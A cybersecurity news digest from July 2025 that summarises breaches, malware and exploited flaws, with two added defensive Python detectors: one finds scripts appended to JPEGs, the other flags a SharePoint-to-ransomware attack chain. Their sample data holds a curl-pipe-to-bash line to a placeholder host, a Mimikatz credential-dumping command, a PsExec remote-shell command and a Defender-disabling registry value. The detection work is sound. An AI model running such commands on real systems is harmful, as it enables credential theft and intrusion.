Daily Brief

2025-07-25 10:26:08 thehackernews DATA BREACH Risks and Impacts of Unauthorized Chinese GenAI Tool Usage
A study by Harmonic Security reports widespread unapproved use of Chinese GenAI tools by US and UK employees. Of roughly 14,000 employees monitored, about 8% used China-based tools such as DeepSeek and Baidu Chat. In a single month more than 17 megabytes of sensitive data, including source code and M&A documents, was uploaded to these platforms. The services have unclear data-handling and privacy policies, so the uploads may breach compliance obligations. DeepSeek was the main destination, accounting for about 85% of the flagged uploads of sensitive data. Harmonic Security is pitching its own monitoring product, which tracks AI usage in real time and enforces policy. The study points to a governance gap in developer-heavy organizations, where policy lags behind tool adoption.
2025-07-25 10:18:38 theregister DATA BREACH Qdos Confirms Data Security Incident Compromising Client Data
Qdos, a business insurance and employment-status specialist, has confirmed a data breach affecting customer personal data. The intrusion came through unauthorized access to the mygoqdos.com web application and was detected on June 19; Qdos brought in third-party cybersecurity experts to investigate. No ransomware was involved, but personal customer information and documents relating to insurance and IR35 services were potentially accessed. Financial data and identity documents such as passports and driving licences were not compromised. Qdos says customers' insurance policies are unaffected and that the online account management used for renewals and applications is secure. It has notified the ICO, FCA, Action Fraud and the NCSC, and is offering affected users free identity monitoring through Experian.
2025-07-25 06:30:00 theregister MISCELLANEOUS Exploring DNSSEC's Challenges and Limited Adoption
The author describes deploying DNSSEC (Domain Name System Security Extensions) for systemsapproach.org and contrasts its weak adoption and visibility with HTTPS. DNSSEC deployment sits at roughly 34%, against about 96% for HTTPS among top websites. DNSSEC has no user-facing indicator equivalent to the HTTPS padlock, so its benefit is invisible to end users. Design critiques, including questionable protocol choices, lead experts to doubt that deployment will rise much. DNSSEC authenticates DNS responses, so a validating resolver can verify that a name-to-address mapping was not forged; it provides integrity, not confidentiality. HTTPS, by contrast, authenticates the server and encrypts the session once the address is known, so the two are complementary. DNS traffic modification for censorship shows why DNS integrity still matters. Newer transports such as DNS over HTTPS (DoH) and Oblivious DNS address privacy but bring their own trade-offs. The article argues for continued work on DNS security despite DNSSEC's shortcomings.
2025-07-24 22:36:28 theregister NATION STATE ACTIVITY Arizona Woman Sentenced in Extensive North Korean IT Fraud Scheme
Christina Marie Chapman, of Arizona, was sentenced to 8.5 years in prison for her part in a $17 million scheme in which North Korean IT workers posed as U.S.-based remote employees. From October 2020 to October 2023 she ran a laptop farm that let the overseas workers obtain and hold U.S. jobs under stolen identities. More than 300 U.S. companies were deceived, including major firms in technology, aerospace and media. The scheme used the identities of 68 U.S. persons, targeted two international firms, and included attempts to place workers at U.S. government agencies. Chapman was ordered to forfeit more than $284,000 that was destined for North Korea and to pay a $176,850 judgment; after her prison term she will serve three years of supervised release. The Department of Justice stressed that weak verification of remote workers helps foreign adversaries such as North Korea, and U.S. Attorney Jeanine Ferris Pirro urged companies to strengthen employee vetting.
2025-07-24 21:38:23 bleepingcomputer CYBERCRIME Global Law Enforcement Seizes BlackSuit Ransomware Domains
The dark web leak sites of the BlackSuit ransomware operation, which breached numerous organizations worldwide, have been seized by law enforcement. The U.S. Department of Justice confirmed that multiple agencies took part in Operation Checkmate; the BlackSuit .onion domains now show a seizure banner from U.S. Homeland Security Investigations. International partners included the U.K. National Crime Agency, Europol and the German State Criminal Police, among others, and Romanian security firm Bitdefender assisted, though no details of its role were given. Recent Cisco Talos analysis suggests BlackSuit, formerly Royal ransomware, may be rebranding as Chaos ransomware. Royal and BlackSuit have together demanded more than $500 million in ransoms since they first appeared.
2025-07-24 21:09:37 theregister CYBERCRIME Major European Healthcare Provider Targeted in Cyber Attack
AMEOS Group, which operates more than 100 hospitals in Europe, has suffered an intrusion into its IT systems. The attackers may have accessed patient and employee data and other sensitive information. AMEOS shut down its network connections and systems as a precaution and has hired forensic experts to establish the extent of the breach and whether data was stolen. It has notified its 18,000 staff and approximately 500,000 patients and suppliers. Emergency communication remains available by telephone, although many calls reportedly went unanswered. The concern is that exposed data could be used for scams or passed to unauthorized third parties. The attack may be linked to the recently exploited Microsoft SharePoint vulnerability that has hit numerous organizations, though no connection has been confirmed.
2025-07-24 21:00:46 bleepingcomputer MALWARE New Koske Linux Malware Utilizes AI and Panda Images
Koske is a new Linux malware that hides its payloads in JPEG images of pandas and deploys cryptocurrency miners. AquaSec assesses that it may have been built with the help of large language models or automation frameworks. Initial access comes through misconfigured, exposed JupyterLab instances. The malware then fetches images from legitimate hosting services that are polyglot files: valid JPEGs with malicious code appended after the image data, so an image viewer shows a panda while the tail of the file is extracted and executed. Two payloads are delivered this way, one acting as a rootkit and the other as a shell script, and both run directly from memory for stealth and persistence. The script adjusts network settings and scans for working proxies to keep the miner's connectivity. Koske can mine 18 different cryptocurrencies and switches to a backup when one fails. AquaSec did not conclusively attribute Koske, although Serbian and Slovak language strings appear in its components, and it warns that more capable AI-assisted malware able to adapt in real time is likely to follow.
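Added example, not code from AquaSec or from Koske: a segment-aware JPEG walker that locates the image's real End-Of-Image marker and reports whatever is appended after it, which is how a polyglot of the kind described above can be spotted. The sample JPEG bytes, the appended script and the list of script markers are constructed for this example. The walker deliberately skips over an embedded EXIF thumbnail (which carries its own EOI) and handles stuffed 0xFF bytes and restart markers in the scan data, so a naive search for the last FF D9 is not relied on.

```python
"""Spot a JPEG polyglot: a valid image with a script or other payload appended after
the real End-Of-Image (EOI) marker.  Added example; not code from AquaSec or Koske."""
import sys

SOI, EOI = b"\xff\xd8", b"\xff\xd9"
# Constructed markers for shell/C payloads; a real scanner would use a wider, tuned set.
SCRIPT_HINTS = (b"#!/bin/bash", b"#!/bin/sh", b"#!/usr/bin/env", b"#include <",
                b"base64 -d", b"curl ", b"wget ", b"/dev/shm", b"nohup ")


def find_eoi(data: bytes) -> int:
    """Walk the marker segments and return the offset just past the image's real EOI.

    Segment-aware parsing matters: an APP1/EXIF thumbnail is itself a JPEG with its own
    EOI, so a naive find/rfind of FF D9 can land in the wrong place.  Entropy-coded data
    after SOS is scanned for the next marker; 0xFF inside it is stuffed as FF 00 or is an RSTn.
    """
    if not data.startswith(SOI):
        raise ValueError("not a JPEG: missing SOI")
    pos, n = 2, len(data)
    while pos + 1 < n:
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:                              # fill byte before a marker
            pos += 1
            continue
        pos += 2
        if marker == 0xD9:                              # EOI: end of the real image
            return pos
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:    # TEM / RSTn carry no length field
            continue
        if pos + 2 > n:
            raise ValueError("truncated segment header")
        seg_len = int.from_bytes(data[pos:pos + 2], "big")
        if seg_len < 2:
            raise ValueError("bad segment length")
        pos += seg_len                                  # length covers itself plus payload
        if marker == 0xDA:                              # SOS: skip scan data to next marker
            while pos + 1 < n:
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("no EOI marker found")


def trailing_payload(data: bytes) -> bytes:
    """Bytes after the real EOI; an honest encoder leaves this empty or nearly so."""
    return data[find_eoi(data):]


def classify(data: bytes) -> dict:
    tail = trailing_payload(data)
    meaningful = tail.strip(b"\x00\r\n\t ")            # tolerate a few bytes of padding
    hints = [h.decode() for h in SCRIPT_HINTS if h in tail]
    if not meaningful:
        verdict = "clean"
    elif hints:
        verdict = "polyglot-script"
    else:
        verdict = "trailing-data"                       # unknown appended blob: still worth a look
    return {"verdict": verdict, "trailer_bytes": len(tail), "hints": hints}


def _seg(marker: int, payload: bytes) -> bytes:
    return b"\xff" + bytes([marker]) + (len(payload) + 2).to_bytes(2, "big") + payload


# Constructed sample: a minimal JPEG whose APP1 segment embeds a thumbnail (with its own
# EOI) and whose scan data contains a stuffed FF 00 and an RST0 marker.
THUMBNAIL = SOI + _seg(0xDA, b"\x01\x01\x00") + b"\x12\x34" + EOI
CLEAN_JPEG = (SOI
              + _seg(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
              + _seg(0xE1, b"Exif\x00\x00" + THUMBNAIL)
              + _seg(0xDA, b"\x01\x01\x00\x00\x3f\x00")
              + b"\xab\xff\x00\xcd\xff\xd0\xef"
              + EOI)
# Constructed stand-in for an appended dropper; the URL is a placeholder.
PANDA_POLYGLOT = CLEAN_JPEG + (b"\n#!/bin/bash\n"
                               b"curl -s http://example.invalid/stage2 | bash\n")

if __name__ == "__main__":
    samples = {"clean.jpg": CLEAN_JPEG, "panda.jpg": PANDA_POLYGLOT}
    for path in sys.argv[1:]:                           # optionally scan real files too
        with open(path, "rb") as fh:
            samples[path] = fh.read()
    for name, blob in samples.items():
        print(name, classify(blob))
```

Run it with no arguments to see the two constructed samples classified, or pass image paths to scan real files. A "trailing-data" verdict on images fetched by a notebook or CI job is worth investigating even without a script marker, since the appended content could just as well be compiled code.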
2025-07-24 18:30:15 theregister CYBERCRIME Cisco ISE Root Access Flaw Exploited Before Patch Issued
Threat actors have been exploiting a critical vulnerability in Cisco's Identity Services Engine (ISE) since early July, before a complete fix was available. CVE-2025-20281, rated the maximum CVSS score of 10.0, allows unauthenticated remote code execution as root. Cisco published advisories for CVE-2025-20281 and other critical ISE flaws in late June and mid-July. The Shadowserver Foundation first observed exploitation around July 5; Cisco acknowledged active exploitation in an advisory update on July 21, about three weeks later. The initial patches were incomplete, and Cisco has since released more robust updates. There are no workarounds, so Cisco urges customers running affected versions to update immediately.
2025-07-24 17:55:04 theregister MISCELLANEOUS Researchers Debunk Efficacy of AI Image Watermarking Technology
Researchers at the University of Waterloo have built "UnMarker", a tool that strips watermarks from AI-generated images. It runs offline on a single 40 GB Nvidia A100 GPU and removes a watermark in minutes. The result undermines watermarking as a defense against misuse of AI-generated content such as deepfakes, despite heavy investment in the technique by companies such as Google and Meta; UnMarker defeated a range of watermarking schemes. After UnMarker was applied, even the best detector still recognized only about 43% of watermarked images, a rate the researchers consider ineffective. The work exposes weaknesses in both commercial and proposed watermarking systems and questions whether digital watermarks can reliably establish the origin of images, which matters given the endorsements they have received from industry and government bodies.
2025-07-24 17:22:55 thehackernews CYBERCRIME Critical Security Update for Mitel's MiVoice and MiCollab Systems
Mitel has released security updates for a critical authentication-bypass flaw in MiVoice MX-ONE. The bug sits in the Provisioning Manager component and could let an unauthenticated attacker gain access to user and administrator accounts. Rated CVSS 9.4, it affects MiVoice MX-ONE versions 7.3 through 7.8 SP1; patches are available and customers should apply them immediately. As an interim mitigation, Mitel advises keeping MX-ONE services on trusted networks and avoiding direct exposure to the internet. Mitel also patched a separate high-severity SQL injection vulnerability in MiCollab that could allow unauthorized information access and database manipulation. Mitel stresses urgency because similar vulnerabilities in its products have been exploited in the past.
2025-07-24 17:13:08 thehackernews NATION STATE ACTIVITY Fire Ant Espionage Campaign Exploits VMware to Infiltrate Networks
Fire Ant, a cyber-espionage group whose tooling overlaps with China-linked UNC3886, has been targeting virtualization infrastructure, specifically VMware ESXi hosts and vCenter servers. Sygnia describes a layered campaign aimed at gaining and keeping access to logically segmented network environments; the attackers were persistent and adaptive, changing tactics and tooling to survive eradication attempts and retain control. They exploited known vulnerabilities, CVE-2023-34048 in VMware vCenter Server and CVE-2023-20867 in VMware Tools, to move through the virtualization layer and extract critical credentials. Persistent backdoors and Python-based implants provided remote command execution that survived reboots. With stolen credentials the attackers interacted directly with guest VMs and tampered with security controls to stay unnoticed. Sygnia's main concern is the lack of visibility and detection at the hypervisor and infrastructure layers, where traditional endpoint security tools do not reach.
2025-07-24 17:02:50 theregister RANSOMWARE SharePoint Servers Targeted for Ransomware Deployment by Storm-2603
Microsoft has confirmed that the threat actor it tracks as Storm-2603 is deploying ransomware on vulnerable on-premises SharePoint servers. Storm-2603 is assessed to be China-based but has not been conclusively tied to a nation state; it is using the SharePoint flaws CVE-2025-49704 (remote code execution) and CVE-2025-49706 (spoofing) to deploy Warlock ransomware. After initial access the group establishes persistence and harvests credentials, notably with Mimikatz, and moves laterally with PsExec. It alters system configuration to disable Microsoft Defender and modifies Group Policy Objects to push the ransomware across the domain. Microsoft warns that unpatched SharePoint servers remain at risk and urges immediate installation of the security updates. More than 400 organizations have been affected, and the U.S. Department of Energy has confirmed an attack on its own SharePoint systems.
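Added example, not Microsoft's published detections or Storm-2603's tooling: a small stage-aware detector run over constructed event lines that models the chain described above (SharePoint worker spawning a shell, Mimikatz, Defender switched off through policy, PsExec, writes into a GPO folder in SYSVOL). The key=value event format, the host names, the assumption that w3wp.exe is the parent of the exploit's shell, and the exact match patterns are this example's own; the Defender policy values and the SYSVOL policy layout are standard Windows locations.

```python
"""Stage-aware detection for the SharePoint-to-ransomware chain described above.
Added example; the event format, hosts and patterns are constructed assumptions, not
Microsoft's published detections."""
import re
from collections import defaultdict

# key=value events, quoted where the value contains spaces (constructed format).
KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

MIMIKATZ = re.compile(r"mimikatz|sekurlsa::|lsadump::|privilege::debug", re.I)
PSEXEC = re.compile(r"^psexe(c|c64|svc)\.exe$", re.I)            # client binaries and service stub
DEFENDER_POLICY = re.compile(r"\\Policies\\Microsoft\\Windows Defender(\\Real-Time Protection)?$", re.I)
DEFENDER_OFF_VALUES = {"disableantispyware", "disablerealtimemonitoring"}
SYSVOL_GPO = re.compile(r"\\SYSVOL\\[^\\]+\\Policies\\\{[0-9A-F-]{36}\}\\", re.I)
WEB_WORKER = "w3wp.exe"   # IIS worker hosting SharePoint (assumption: parent of the exploit's shell)


def parse(line: str) -> dict:
    return {k: q or u for k, q, u in KV.findall(line)}


def is_initial_access(e):       # SharePoint worker process spawning a shell
    return (e.get("type") == "process" and e.get("parent", "").lower() == WEB_WORKER
            and e.get("image", "").lower() in {"cmd.exe", "powershell.exe"})


def is_credential_theft(e):     # match Mimikatz on the command line, so renaming the binary does not help
    return e.get("type") == "process" and bool(MIMIKATZ.search(e.get("image", "") + " " + e.get("cmd", "")))


def is_lateral_movement(e):
    return e.get("type") == "process" and bool(PSEXEC.match(e.get("image", "")))


def is_defense_evasion(e):      # Defender disabled through its policy registry values
    return (e.get("type") == "registry" and bool(DEFENDER_POLICY.search(e.get("key", "")))
            and e.get("value", "").lower() in DEFENDER_OFF_VALUES and e.get("data") == "1")


def is_gpo_tampering(e):        # writes into a GPO's SYSVOL folder (scripts, scheduled tasks)
    return e.get("type") == "file" and e.get("op") == "write" and bool(SYSVOL_GPO.search(e.get("path", "")))


RULES = [("initial_access", is_initial_access), ("credential_theft", is_credential_theft),
         ("lateral_movement", is_lateral_movement), ("defense_evasion", is_defense_evasion),
         ("gpo_tampering", is_gpo_tampering)]


def detect(lines):
    """One alert per (event, matching rule), in event order."""
    alerts = []
    for line in lines:
        e = parse(line)
        for stage, pred in RULES:
            if pred(e):
                alerts.append({"ts": e.get("ts"), "host": e.get("host"), "stage": stage, "event": line})
    return alerts


def summarize(alerts):
    """Distinct stages seen per host, sorted for stable comparison."""
    per_host = defaultdict(set)
    for a in alerts:
        per_host[a["host"]].add(a["stage"])
    return {h: sorted(s) for h, s in per_host.items()}


def escalate(summary, min_stages=3):
    """Hosts showing several stages of the chain rather than one noisy rule."""
    return sorted(h for h, stages in summary.items() if len(stages) >= min_stages)


# Constructed sample events: SP01 is a SharePoint server, DC01 a domain controller, WS07 a workstation.
SAMPLE_EVENTS = [
    r'ts=2025-07-22T03:11:05Z host=SP01 type=process parent=w3wp.exe image=cmd.exe cmd="cmd.exe /c whoami"',
    r'ts=2025-07-22T03:12:40Z host=SP01 type=process parent=cmd.exe image=services.exe cmd="services.exe"',
    r'ts=2025-07-22T03:15:12Z host=SP01 type=process parent=cmd.exe image=svchost.exe cmd="C:\Temp\svchost.exe privilege::debug sekurlsa::logonpasswords"',
    r'ts=2025-07-22T03:20:01Z host=SP01 type=registry key="HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" value=DisableAntiSpyware data=1',
    r'ts=2025-07-22T03:25:33Z host=SP01 type=process parent=cmd.exe image=PsExec64.exe cmd="PsExec64.exe \\DC01 -s cmd.exe"',
    r'ts=2025-07-22T03:40:18Z host=DC01 type=file op=write path="\\DC01\SYSVOL\corp.local\Policies\{A1B2C3D4-0000-1111-2222-333344445555}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml"',
    r'ts=2025-07-22T09:00:00Z host=WS07 type=process parent=explorer.exe image=powershell.exe cmd="powershell.exe Get-Date"',
]

if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for a in found:
        print(f'{a["ts"]} {a["host"]:5} {a["stage"]}')
    print("escalate:", escalate(summarize(found)))
```

The third sample event shows why credential-theft detection keys on the command line rather than the file name: the Mimikatz copy is renamed to svchost.exe but still carries its module syntax. The escalation step only raises hosts that show several stages, which keeps a lone PsExec run by an administrator from paging anyone while the SharePoint server, which hits four stages, is surfaced.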
2025-07-24 16:54:38 bleepingcomputer MALWARE Hacker Exploits Steam Game to Deploy Infostealer Malware
The threat actor EncryptHub compromised an early-access game on Steam and inserted infostealer malware into its game files. The chain started with HijackLoader, which established persistence on the victim's machine and then fetched the Vidar infostealer, retrieved via a Telegram channel. A few hours after HijackLoader was inserted, Fickle Stealer was added through a malicious DLL, targeting browser credentials and cryptocurrency wallet data. EncryptHub previously used Fickle Stealer in a campaign that hit more than 600 organizations worldwide, so this is a recurring actor. The malware runs silently and does not affect game performance, so players have no sign that anything is wrong. Because the malicious files were legitimate-looking executables delivered through Steam, the platform's trust helped them evade suspicion. The case shows the risk of early-access or "work-in-progress" titles, which may receive lighter review. Neither the game's developer nor Steam had responded at the time of writing, and the game remained available; users are advised not to download it until the situation is clarified.
2025-07-24 15:46:40 theregister MALWARE Coyote Malware Targets Banking Credentials via UI Automation
Coyote, a banking trojan, is abusing Microsoft's UI Automation (UIA) accessibility framework to steal credentials from Brazilian users of 75 banking and cryptocurrency websites. Coyote was first seen in the wild in February 2024; this latest variant's use of UIA is a novel technique. UIA exists so assistive technology can inspect and drive application interfaces, and Coyote uses that same access to read the browser's window title and address bar, match the visited site against its target list, and then pull user data out of the financial application. It first gathers victim details and which financial services they use, then relies on UIA to locate and extract credentials. Akamai notes that because the technique rides on a legitimate Windows framework, it can slip past traditional antivirus and endpoint security. Coyote also retains keylogging and phishing overlays, adding to its stealth and effectiveness. Its continued evolution shows how persistently and adaptively threat actors target financial institutions.
2025-07-24 15:22:52 theregister MISCELLANEOUS EFF Continues the Fight for Internet Privacy and Freedom
The Electronic Frontier Foundation (EFF) remains committed to defending online rights and is turning to emerging threats such as the concentration of data in Palantir's hands and mass data harvesting. Cindy Cohn, at EFF since 2000 and its executive director since 2015, describes the organization's role in defending privacy and freedom against government overreach and private data brokers. EFF's landmark cases include backing Dan Bernstein in the 1990s against U.S. export controls on cryptography and exposing AT&T's cooperation with government surveillance in 2006. Current concerns include the potential use of Palantir's large databases for warrantless government surveillance and U.S. Supreme Court decisions affecting personal privacy. Through changing administrations EFF continues to advocate for strong encryption as protection against unauthorized surveillance. Whistleblowers remain essential to exposing illegal activity, and EFF supports them with legal assistance alongside tools such as Privacy Badger and the Atlas of Surveillance. With support from prominent technologists and a focus on its core principles of free speech, privacy and innovation, EFF aims to push for stronger legal protections and greater public awareness.